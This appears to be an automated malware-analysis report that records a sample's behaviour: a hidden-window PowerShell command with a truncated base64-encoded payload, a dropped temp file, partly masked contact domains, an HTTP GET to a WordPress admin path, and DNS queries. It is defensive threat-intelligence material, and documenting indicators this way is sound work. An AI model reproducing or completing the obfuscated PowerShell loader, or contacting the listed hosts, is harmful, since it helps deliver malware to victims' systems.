Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABaADcAOABtAGsAXwBpAD0AKAAoACcAWgAnACsAJwBqAGkAJwApACsAJwB1ACcAKwAoACcAcwBoACcAKwAnAGUAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtACcAKwAnAGkAdABlAG0AJwApACAAJABFAG4AdgA6AFUAcw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1448
Modifies file system
Creates the following files
- %TEMP%\843076.cvr
Network activity
Connects to
- 'ni###keji.com':443
- 'de####alliance.se':80
TCP
HTTP GET requests
- http://de####alliance.se/wp-admin/ovZBX/
UDP
- DNS ASK bo#####roadesivos.com
- DNS ASK si####elektrik.com
- DNS ASK ni###keji.com
- DNS ASK cl###raks.com
- DNS ASK cl###room.live
- DNS ASK fu#####onemme.com.ar
- DNS ASK de####alliance.se
Miscellaneous
Executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABaADcAOABtAGsAXwBpAD0AKAAoACcAWgAnACsAJwBqAGkAJwApACsAJwB1ACcAKwAoACcAcwBoACcAKwAnAGUAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtACcAKwAnAGkAdABlAG0AJwApACAAJABFAG4AdgA6AFUAcw...' (with hidden window)
